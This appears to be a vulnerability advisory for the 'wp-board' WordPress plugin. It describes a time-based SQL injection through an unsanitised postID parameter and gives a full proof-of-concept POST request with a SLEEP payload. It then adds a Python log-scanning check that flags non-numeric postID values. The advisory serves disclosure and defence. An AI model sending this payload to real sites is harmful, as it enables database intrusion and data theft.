The options.php file of the plugin accepts a postid parameter which is not sanitised, escaped or validated before being inserted into a SQL statement, leading to SQL injection. This is a time-based SQLi, and the vulnerable parameter is passed twice in the same function, so a delay of 5 seconds takes 10 seconds to return because the injected query runs twice.
POST /wp-content/plugins/wp-board/php/actions.php?action=modp&postID=0%20AND%20(SELECT%201067%20FROM (SELECT(SLEEP(5)))PVan) HTTP/1.1
Content-Length: 19
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept: */*
Sec-GPC: 1
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Connection: close

newtext=sad&imp=off
Syed Sheeraz Ali of Codevigilant
Yes
2021-08-22 (about 9 months ago)
2021-08-23 (about 9 months ago)
2022-03-07 (about 2 months ago)
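A defender-side check for the issue described above, as an added example that is not part of the original advisory or the plugin's code: postID should only ever be a numeric ID, so any request to the plugin endpoint carrying a non-integer postID is worth flagging in access logs. The combined log format, the function name and the sample lines are assumptions constructed for this example; the second sample line reuses the request shown in the advisory.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Endpoint path taken from the request shown in the advisory.
PLUGIN_PATH = "/wp-content/plugins/wp-board/php/actions.php"
# Request line inside a combined-format access log entry (assumed log format).
# The greedy target also tolerates a literal space inside the URL.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>.+) HTTP/[\d.]+"')

# Constructed sample log lines, not taken from a real server.
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2022:10:00:00 +0000] '
    '"POST /wp-content/plugins/wp-board/php/actions.php?action=modp&postID=42 HTTP/1.1" 200 12',
    '203.0.113.9 - - [01/Jan/2022:10:00:05 +0000] '
    '"POST /wp-content/plugins/wp-board/php/actions.php?action=modp'
    '&postID=0%20AND%20(SELECT%201067%20FROM (SELECT(SLEEP(5)))PVan) HTTP/1.1" 200 12',
    '203.0.113.9 - - [01/Jan/2022:10:00:20 +0000] "GET /index.php?postID=abc HTTP/1.1" 200 512',
    '203.0.113.4 - - [01/Jan/2022:10:01:00 +0000] '
    '"POST /wp-content/plugins/wp-board/php/actions.php?action=modp&postid=7%2b1 HTTP/1.1" 200 12',
]


def suspicious_post_ids(lines):
    """Return (client_ip, decoded_value) for every request to the plugin
    endpoint whose postID is not a plain non-negative integer."""
    hits = []
    for line in lines:
        match = REQUEST_RE.search(line)
        if not match:
            continue
        url = urlsplit(match.group("target"))
        if url.path != PLUGIN_PATH:
            continue  # other endpoints are out of scope for this check
        for name, value in parse_qsl(url.query, keep_blank_values=True):
            # The advisory spells the parameter both "postid" and "postID".
            if name.lower() == "postid" and not re.fullmatch(r"[0-9]+", value):
                hits.append((line.split()[0], value))
    return hits


if __name__ == "__main__":
    for client, value in suspicious_post_ids(SAMPLE_LOG):
        print(f"{client}: non-numeric postID {value!r}")
```

The same integer-only rule is what the server side should enforce before the value reaches the query.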